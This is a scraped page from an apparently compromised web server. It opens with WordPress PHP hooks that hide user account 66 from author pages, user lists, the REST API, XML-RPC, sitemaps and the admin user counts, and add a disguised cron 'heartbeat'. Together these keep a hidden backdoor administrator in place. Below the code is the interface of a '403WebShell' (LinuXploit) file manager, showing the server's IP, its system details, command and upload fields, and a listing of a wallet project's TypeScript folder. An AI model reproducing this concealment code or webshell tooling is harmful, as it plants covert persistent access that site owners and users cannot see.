add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emajiwallet/node_modules/typescript/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
November 28 2025 14:18:00
deploy / www-data
0755
cs
--
November 28 2025 14:18:00
deploy / www-data
0755
de
--
November 28 2025 14:18:00
deploy / www-data
0755
es
--
November 28 2025 14:18:00
deploy / www-data
0755
fr
--
November 28 2025 14:18:00
deploy / www-data
0755
it
--
November 28 2025 14:18:00
deploy / www-data
0755
ja
--
November 28 2025 14:18:00
deploy / www-data
0755
ko
--
November 28 2025 14:18:00
deploy / www-data
0755
pl
--
November 28 2025 14:18:00
deploy / www-data
0755
pt-br
--
November 28 2025 14:18:00
deploy / www-data
0755
ru
--
November 28 2025 14:18:00
deploy / www-data
0755
tr
--
November 28 2025 14:18:00
deploy / www-data
0755
zh-cn
--
November 28 2025 14:18:00
deploy / www-data
0755
zh-tw
--
November 28 2025 14:18:00
deploy / www-data
0755
_tsc.js
5.89 MB
November 28 2025 14:17:59
deploy / www-data
0775
_tsserver.js
27.234 KB
November 28 2025 14:17:59
deploy / www-data
0775
_typingsInstaller.js
10.12 KB
November 28 2025 14:17:59
deploy / www-data
0775
lib.d.ts
0.969 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.decorators.d.ts
12.883 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.decorators.legacy.d.ts
1.295 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.dom.asynciterable.d.ts
1.843 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.dom.d.ts
1.32 MB
November 28 2025 14:18:00
deploy / www-data
0775
lib.dom.iterable.d.ts
25.598 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.collection.d.ts
5.106 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.core.d.ts
22.33 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.d.ts
1.212 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.generator.d.ts
2.497 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.iterable.d.ts
17.773 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.promise.d.ts
3.125 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.proxy.d.ts
5.128 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.reflect.d.ts
6.341 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.symbol.d.ts
1.61 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2015.symbol.wellknown.d.ts
10.745 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2016.array.include.d.ts
5.082 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2016.d.ts
0.942 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2016.full.d.ts
1.008 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2016.intl.d.ts
1.449 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.arraybuffer.d.ts
0.894 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.d.ts
1.135 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.date.d.ts
1.871 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.full.d.ts
1.008 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.intl.d.ts
1.415 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.object.d.ts
2.415 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.sharedmemory.d.ts
7.029 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.string.d.ts
2.322 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2017.typedarrays.d.ts
1.506 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.asyncgenerator.d.ts
2.629 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.asynciterable.d.ts
2.204 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.d.ts
1.063 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.intl.d.ts
2.95 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.promise.d.ts
1.321 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2018.regexp.d.ts
1.203 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.array.d.ts
3.089 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.d.ts
1.046 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.intl.d.ts
0.936 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.object.d.ts
1.438 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.string.d.ts
1.492 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2019.symbol.d.ts
0.982 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.bigint.d.ts
37.29 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.d.ts
1.173 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.date.d.ts
2.887 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.intl.d.ts
21.912 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.number.d.ts
1.55 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.promise.d.ts
1.761 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.sharedmemory.d.ts
5.008 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.string.d.ts
2.496 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2020.symbol.wellknown.d.ts
1.568 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.d.ts
1.012 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.intl.d.ts
8.052 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.promise.d.ts
2.209 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.string.d.ts
1.555 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2021.weakref.d.ts
3.097 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.array.d.ts
4.566 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.d.ts
1.082 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.error.d.ts
2.323 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.intl.d.ts
6.019 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.object.d.ts
1.06 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.regexp.d.ts
1.3 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2022.string.d.ts
1.128 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2023.array.d.ts
39.293 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2023.collection.d.ts
0.879 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2023.d.ts
0.976 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2023.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2023.intl.d.ts
2.583 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.arraybuffer.d.ts
2.575 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.collection.d.ts
1.195 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.d.ts
1.139 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.object.d.ts
1.229 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.promise.d.ts
1.356 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.regexp.d.ts
1.048 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.sharedmemory.d.ts
3.005 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es2024.string.d.ts
1.166 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es5.d.ts
212.592 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.es6.d.ts
1.008 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.array.d.ts
1.749 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.collection.d.ts
3.787 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.d.ts
1.173 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.decorators.d.ts
1.045 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.disposable.d.ts
6.646 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.float16.d.ts
19.878 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.full.d.ts
1.049 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.intl.d.ts
0.872 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.iterator.d.ts
8.473 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.esnext.promise.d.ts
1.619 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.scripthost.d.ts
9.229 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.webworker.asynciterable.d.ts
1.843 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.webworker.d.ts
460.048 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.webworker.importscripts.d.ts
1.017 KB
November 28 2025 14:18:00
deploy / www-data
0775
lib.webworker.iterable.d.ts
19.968 KB
November 28 2025 14:18:00
deploy / www-data
0775
tsc.js
0.261 KB
November 28 2025 14:17:59
deploy / www-data
0775
tsserver.js
0.266 KB
November 28 2025 14:17:59
deploy / www-data
0775
tsserverlibrary.d.ts
0.845 KB
November 28 2025 14:18:00
deploy / www-data
0775
tsserverlibrary.js
0.988 KB
November 28 2025 14:17:59
deploy / www-data
0775
typesMap.json
16.395 KB
November 28 2025 14:18:00
deploy / www-data
0775
typescript.d.ts
572.358 KB
November 28 2025 14:18:00
deploy / www-data
0775
typescript.js
8.65 MB
November 28 2025 14:18:00
deploy / www-data
0775
typingsInstaller.js
0.273 KB
November 28 2025 14:18:00
deploy / www-data
0775
watchGuard.js
2.259 KB
November 28 2025 14:18:00
deploy / www-data
0775

Youez - 2016 - github.com/yon3zu
LinuXploit